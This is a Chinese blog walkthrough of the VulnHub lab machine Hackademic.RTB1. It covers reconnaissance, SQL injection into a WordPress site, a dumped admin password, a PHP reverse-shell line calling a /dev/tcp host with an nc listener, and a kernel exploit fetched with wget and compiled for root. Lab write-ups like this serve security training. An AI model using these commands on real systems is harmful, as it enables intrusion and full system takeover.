vulnhub系列:Hackademic.RTB1

最新推荐文章于 2024-08-16 15:00:00 发布
最新推荐文章于 2024-08-16 15:00:00 发布
阅读量284 收藏 3
点赞数 4
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141173826
版权

vulnhub系列:Hackademic.RTB1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

nmap 192.168.23.0/24

namp扫描网段

nmap 扫描端口,开放端口:22、80

nmap 192.168.23.143 -p- -Pn -sV -O

nmap端口扫描

访问80端口,页面发现 target 可以点击

首页

点击后跳转,页面提示目标是读取到 key.txt 文件

点击target

wappalyzer 查看网站使用的 cms、语言等

插件看cms

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

feed=rss看到框架版本

dirb目录扫描

dirb http://192.168.23.143/

dirb目录扫描

前面发现为 wordpress,kali 使用 wpscan 扫描网站

wpscan扫描网站

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wp-admin,发现后台登录页面

http://192.168.23.143/Hackademic_RTB1/wp-admin

发现后台登录页面

使用 wpscan 扫描用户

wpscan扫描用户

使用 cewl 爬取网站密码文本

cewl 192.168.23.143 -w pass.txt

爆破没有爆破出来

findsomething 中有一些参数,尝试sql注入,发现存在sql注入

192.168.23.143/Hackademic_RTB1/?cat=1

存在sql注入

dump 下数据,获取账号密码

获取账号密码

可以看到有个10级用户,直接登录这个账号

GeorgeMiller:q1w2e3

登录成功

发现后台的 php 文件,且给出了文件路径

发现php文件

添加 phpinfo();,访问文件发现可以解析执行

访问发现存在

二、getshell

写入一句话 getshell

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");

image-20240813202634027

kali 开启监听

nc -lvnp 4444

image-20240813202553129

访问文件,反弹成功

http://192.168.23.143/Hackademic_RTB1/wp-content/plugins/hello.php

image-20240813202615365

三、提权

使用 python 提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

image-20240813203831776

查看当前权限,需要密码

sudo -l

查看内核版本

uname -a

image-20240813204917182

搜一下相关版本的提权漏洞

searchsploit linux kernel 2.6.3

image-20240813205206825

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

searchsploit -m 15285

image-20240813205514524

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

python3 -m http.server

wget http://192.168.23.133:8000/15285.c

image-20240813205705481

image-20240813205734802

进行编译后,执行文件,提权成功

gcc 15285.c -o 15285
./15285

image-20240813205856293

在 root 目录下发现 flag

image-20240813205955882

三天三夜睡不着
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列Hackademic: RTB1
汗的博客
03-30 2197
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
bidder:适用于RTB4FREE的OpenRTB 2.0兼容竞标者,开源竞标者DSP
05-13
竞价人-RTB4FREE竞价人 这是的竞标者组件。 该竞标者是基于Java 1.8的openRTB竞标系统,可扩展到每个节点25K + QPS。 可从直接获得此仓库的图像 获得帮助 用户文档可在“找到 源代码 要开始使用代码,请首先确保在...
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1060
靶机精讲之Hackademic: RTB1vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
Hackademic.RTB1靶场详细通关教程
weixin_59147806的博客
11-10 173
Hackademic.RTB1靶场详细通关教程,包括getshell、提权及flag获取。
Hackademic.RTB1 靶机渗透测试流程
RemedyVI的博客
07-17 346
信息收集知道使用了wordpressCMS,通过SQL注入得到后台登录的users表,登录后台通过主题文件修改得到反弹shell,最后利用系统漏洞提权,总体来说靶机难度很简单。
渗透测试靶机:vulnhub-Hackademic.RTB1
m0_70830611的博客
11-23 412
发现GeorgeMiller用户有配置选项,开启文件上传,启用后可以看到右边多了个"upload"提示需要获取root权限和root目录下的key.txt,然后还发现有几个链接可以点击,点一下。下面两个链接都试一下手动注入,发现第二个存在sql漏洞。上传文件后,开启监听,访问webshell。然后回到原本监听着的webshell。发现有个wp-admin的子目录。选定一个然后开启apache服务。获取root下的key.txt。发现权限不够,想办法提权。修改为kali的ip。
Vulnhub靶机:HACKADEMIC_ RTB1
LainWith的博客
12-23 659
Hackademic(此系列共2台)发布日期:2011年9月6日难度:初级运行环境:VMware Workstation目标:取得 root 权限 + flag主机发现端口扫描+漏洞扫描Sql注入wordpress挂马内核提权。
Vulnhub靶机】Hackadmeic.RTB1
过期的秋刀鱼
08-19 487
(此系列共2台)难度:初级。
Vulnhub——Hackademic.RTB1
weixin_52512479的博客
07-25 162
利用获取得到的密码以及数据库密码均不能登录。发现原来是一个wordpress搭建的。上传到靶机,并利用,获取到root权限。通过手动注入发现在此处存在sql注入。root下有一个Key.txt文件。反弹shell利用kali连接。开启上传权限,添加php后缀。尝试用获取的的账户密码登录。上传一句话,连接蚁剑。
Vulnhub系列靶机-Hackadmeic.RTB1
来日可期的博客
09-17 1641
刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录。并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。提交之后,需要获取到上传的路径,才可以触发反弹shell。,发现有SQL语句的报错信息,可以判断有SQL注入漏洞。扫描到了22端口和80端口,但是22端口的关闭的。在点击页面中能点击的链接的时候,发现点击。
openrtb:Go的OpenRTB协议定义
04-14
OpenRTB Go的OpenRTB结构和验证。要求需要Go 1.8+才能进行正确的json.RawMessage封送处理。... Open ( "stored.json" ... Close () var req * openrtb. BidRequest if err := json . NewDecoder ( file ). Decode ( & req
OpenRTB:OpenRTB 的 PHP 抽象
06-28
1. **OpenRTB对象模型**:将OpenRTB规范中的各种对象(如Impressions、Bids、Requests和Responses)映射为PHP类,使开发者能够更容易地操作这些结构。 2. **序列化和反序列化**:为了在PHP和OpenRTB JSON消息之间...
rtb4free:RTB4FREE核心存储库,当前包含文档,API Explorer和该项目中其他存储库的指针的源代码-dsp source code
03-24
RTB4免费 RTB4FREE是用于基于RTB的数字广告的企业实力竞标平台。 RTB4FREE具有以下功能: 战役管理 数据管理(DMP)功能 使用多种策略进行竞标 分析历史媒体和价格信息 Github上的组织包含用于运行完全可扩展系统的...
mock-bidder:模拟开放rtb投标人以进行测试
05-19
模拟竞标者 这是模拟open-rtb bidder的golang实现(用于测试) 如何安装 只需致电 go get github.com/sharpyfox/mock-bidder 它将下载项目,进行构建,然后将二进制文件放入GOPATH/bin目录。 享受
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 688
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
Animetronic - hackmyvm
tanbinn的博客
08-12 474
hackmyvm的Animetronic靶场
网络协议八 网络安全相关
hunandede的博客
08-12 431
ARP欺骗的防护原理。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-16 767
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值